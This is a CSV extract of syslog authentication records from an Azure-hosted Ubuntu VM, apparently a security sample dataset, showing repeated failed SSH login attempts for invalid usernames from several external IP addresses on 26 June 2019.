+7339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:40,UbuntuDevEnv,2019-06-26 17:51:39,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 37841:11: Bye Bye [preauth],55449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,37841,,
+7340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:40,UbuntuDevEnv,2019-06-26 17:51:39,auth,UbuntuDevEnv,info,Disconnected from invalid user dz 54.37.66.73 port 37841 [preauth],55449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,54.37.66.7,37841,,
+7341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:40,UbuntuDevEnv,2019-06-26 17:51:40,auth,UbuntuDevEnv,info,Failed password for invalid user sublink from 80.108.220.67 port 44976 ssh2,55434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,80.108.220.6,44976,,
+7342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:40,UbuntuDevEnv,2019-06-26 17:51:40,auth,UbuntuDevEnv,info,Disconnected from invalid user sublink 80.108.220.67 port 44976 [preauth],55434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,80.108.220.6,44976,,
+7343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:40,UbuntuDevEnv,2019-06-26 17:51:40,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 44976:11: Bye Bye [preauth],55434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,44976,,
+7344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:03,UbuntuDevEnv,2019-06-26 17:52:03,auth,UbuntuDevEnv,info,Invalid user shuai from 107.175.127.237 port 41398,55529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuai,107.175.127.2,41398,,
+7345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:03,UbuntuDevEnv,2019-06-26 17:52:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:03,UbuntuDevEnv,2019-06-26 17:52:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,55529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+7347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:05,UbuntuDevEnv,2019-06-26 17:52:05,auth,UbuntuDevEnv,info,Failed password for invalid user shuai from 107.175.127.237 port 41398 ssh2,55529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuai,107.175.127.2,41398,,
+7348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:06,UbuntuDevEnv,2019-06-26 17:52:05,auth,UbuntuDevEnv,info,Disconnected from invalid user shuai 107.175.127.237 port 41398 [preauth],55529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuai,107.175.127.2,41398,,
+7349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:06,UbuntuDevEnv,2019-06-26 17:52:05,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 41398:11: Bye Bye [preauth],55529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,41398,,
+7350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:12,UbuntuDevEnv,2019-06-26 17:52:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:12,UbuntuDevEnv,2019-06-26 17:52:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,55558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+7352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:12,UbuntuDevEnv,2019-06-26 17:52:12,auth,UbuntuDevEnv,info,Invalid user marketing from 58.87.109.107 port 46833,55558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,58.87.109.1,46833,,
+7353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:14,UbuntuDevEnv,2019-06-26 17:52:14,auth,UbuntuDevEnv,info,Failed password for invalid user marketing from 58.87.109.107 port 46833 ssh2,55558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,58.87.109.1,46833,,
+7354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:15,UbuntuDevEnv,2019-06-26 17:52:15,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 46833:11: Bye Bye [preauth],55558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,46833,,
+7355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:15,UbuntuDevEnv,2019-06-26 17:52:15,auth,UbuntuDevEnv,info,Disconnected from invalid user marketing 58.87.109.107 port 46833 [preauth],55558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marketing,58.87.109.1,46833,,
+7356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:05,UbuntuDevEnv,2019-06-26 18:10:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:05,UbuntuDevEnv,2019-06-26 18:10:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,59587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+7358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:05,UbuntuDevEnv,2019-06-26 18:10:04,auth,UbuntuDevEnv,info,Invalid user pentaho from 107.175.127.237 port 37718,59587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentaho,107.175.127.2,37718,,
+7359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:05,UbuntuDevEnv,2019-06-26 18:10:05,auth,UbuntuDevEnv,info,Failed password for invalid user sinusbot from 157.230.190.1 port 34026 ssh2,59578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,157.230.190.1,34026,,
+7360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:05,UbuntuDevEnv,2019-06-26 18:10:05,auth,UbuntuDevEnv,info,Disconnected from invalid user sinusbot 157.230.190.1 port 34026 [preauth],59578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,157.230.190.1,34026,,
+7361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:05,UbuntuDevEnv,2019-06-26 18:10:05,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 34026:11: Bye Bye [preauth],59578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,34026,,
+7362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:08,UbuntuDevEnv,2019-06-26 18:10:07,auth,UbuntuDevEnv,info,Failed password for invalid user pentaho from 107.175.127.237 port 37718 ssh2,59587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentaho,107.175.127.2,37718,,
+7363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:08,UbuntuDevEnv,2019-06-26 18:10:07,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 37718:11: Bye Bye [preauth],59587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,37718,,
+7364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:08,UbuntuDevEnv,2019-06-26 18:10:07,auth,UbuntuDevEnv,info,Disconnected from invalid user pentaho 107.175.127.237 port 37718 [preauth],59587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentaho,107.175.127.2,37718,,
+7365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:40,UbuntuDevEnv,2019-06-26 18:10:39,auth,UbuntuDevEnv,info,Invalid user mailman from 58.87.109.107 port 58900,59720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailman,58.87.109.1,58900,,
+7366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:40,UbuntuDevEnv,2019-06-26 18:10:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,59720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+7367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:40,UbuntuDevEnv,2019-06-26 18:10:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:40,UbuntuDevEnv,2019-06-26 18:10:40,auth,UbuntuDevEnv,info,Invalid user user01 from 54.37.66.73 port 36772,59726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,54.37.66.7,36772,,
+7369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:40,UbuntuDevEnv,2019-06-26 18:10:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,59726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+7370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:40,UbuntuDevEnv,2019-06-26 18:10:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:42,UbuntuDevEnv,2019-06-26 18:10:42,auth,UbuntuDevEnv,info,Failed password for invalid user mailman from 58.87.109.107 port 58900 ssh2,59720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailman,58.87.109.1,58900,,
+7372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:43,UbuntuDevEnv,2019-06-26 18:10:42,auth,UbuntuDevEnv,info,Failed password for invalid user user01 from 54.37.66.73 port 36772 ssh2,59726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,54.37.66.7,36772,,
+7373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:43,UbuntuDevEnv,2019-06-26 18:10:42,auth,UbuntuDevEnv,info,Disconnected from invalid user user01 54.37.66.73 port 36772 [preauth],59726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user01,54.37.66.7,36772,,
+7374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:43,UbuntuDevEnv,2019-06-26 18:10:42,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 36772:11: Bye Bye [preauth],59726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,36772,,
+7375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:43,UbuntuDevEnv,2019-06-26 18:10:43,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 58900:11: Bye Bye [preauth],59720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,58900,,
+7376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:10:43,UbuntuDevEnv,2019-06-26 18:10:43,auth,UbuntuDevEnv,info,Disconnected from invalid user mailman 58.87.109.107 port 58900 [preauth],59720,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailman,58.87.109.1,58900,,
+7377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:11:48,UbuntuDevEnv,2019-06-26 18:11:48,auth,UbuntuDevEnv,info,Invalid user mangue from 157.230.190.1 port 50592,59963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mangue,157.230.190.1,50592,,
+7378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:11:48,UbuntuDevEnv,2019-06-26 18:11:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:11:48,UbuntuDevEnv,2019-06-26 18:11:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,59963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+7380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:11:51,UbuntuDevEnv,2019-06-26 18:11:50,auth,UbuntuDevEnv,info,Failed password for invalid user mangue from 157.230.190.1 port 50592 ssh2,59963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mangue,157.230.190.1,50592,,
+7381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:11:51,UbuntuDevEnv,2019-06-26 18:11:50,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 50592:11: Bye Bye [preauth],59963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,50592,,
+7382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:11:51,UbuntuDevEnv,2019-06-26 18:11:50,auth,UbuntuDevEnv,info,Disconnected from invalid user mangue 157.230.190.1 port 50592 [preauth],59963,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mangue,157.230.190.1,50592,,
+7383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:00,UbuntuDevEnv,2019-06-26 18:11:59,auth,UbuntuDevEnv,info,Invalid user admin from 203.39.148.165 port 56288,59998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,203.39.148.1,56288,,
+7384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:00,UbuntuDevEnv,2019-06-26 18:11:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.39.148.165,59998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.39.148.1,,0,
+7385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:00,UbuntuDevEnv,2019-06-26 18:11:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:01,UbuntuDevEnv,2019-06-26 18:12:01,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 203.39.148.165 port 56288 ssh2,59998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,203.39.148.1,56288,,
+7387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:02,UbuntuDevEnv,2019-06-26 18:12:01,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 203.39.148.165 port 56288 [preauth],59998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,203.39.148.1,56288,,
+7388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:12:02,UbuntuDevEnv,2019-06-26 18:12:01,auth,UbuntuDevEnv,info,"Received disconnect from 203.39.148.165 port 56288:11: Normal Shutdown, Thank you for playing [preauth]",59998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.39.148.1,56288,,
+7389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:25,UbuntuDevEnv,2019-06-26 18:15:24,auth,UbuntuDevEnv,info,Invalid user postgres from 167.99.46.145 port 59080,61024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,167.99.46.1,59080,,
+7390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:25,UbuntuDevEnv,2019-06-26 18:15:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=167.99.46.145,61024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,167.99.46.1,,0,
+7391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:25,UbuntuDevEnv,2019-06-26 18:15:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:27,UbuntuDevEnv,2019-06-26 18:15:26,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 167.99.46.145 port 59080 ssh2,61024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,167.99.46.1,59080,,
+7393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:27,UbuntuDevEnv,2019-06-26 18:15:27,auth,UbuntuDevEnv,info,"Received disconnect from 167.99.46.145 port 59080:11: Normal Shutdown, Thank you for playing [preauth]",61024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,167.99.46.1,59080,,
+7394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:27,UbuntuDevEnv,2019-06-26 18:15:27,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 167.99.46.145 port 59080 [preauth],61024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,167.99.46.1,59080,,
+7395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:08,UbuntuDevEnv,2019-06-26 18:16:07,auth,UbuntuDevEnv,info,Invalid user files from 80.108.220.67 port 41492,61209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,80.108.220.6,41492,,
+7396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:08,UbuntuDevEnv,2019-06-26 18:16:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,61209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+7397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:08,UbuntuDevEnv,2019-06-26 18:16:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:09,UbuntuDevEnv,2019-06-26 18:16:09,auth,UbuntuDevEnv,info,Failed password for invalid user files from 80.108.220.67 port 41492 ssh2,61209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,80.108.220.6,41492,,
